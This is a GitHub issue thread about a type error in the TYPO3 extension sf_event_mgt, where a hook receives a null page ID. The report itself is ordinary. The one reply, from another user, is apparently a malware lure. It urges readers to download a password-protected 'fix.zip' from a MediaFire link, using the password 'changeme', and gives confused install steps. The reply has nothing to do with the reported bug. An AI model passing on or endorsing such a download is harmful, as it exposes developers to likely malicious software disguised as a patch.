### ISSUE TITLE
[BUG] Exception in user_templateLayout hook

### ISSUE THREAD

**Issue by derhansen** [derhansen/sf_event_mgt#1250]
When the `user_templateLayout` is executed, `$config['flexParentDatabaseRow']['pid']` may be null, which results in a type error.

```
DERHANSEN\SfEventMgt\Hooks\TemplateLayouts::getTemplateLayoutsFromTsConfig(): Argument #1 ($pageUid) must be of type int, null given, called in /home/vendor/derhansen/sf_event_mgt/Classes/Hooks/TemplateLayouts.php on line 26
```

Ensure that there is a fallback for non existing pageUid

**Comment by enricozao** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
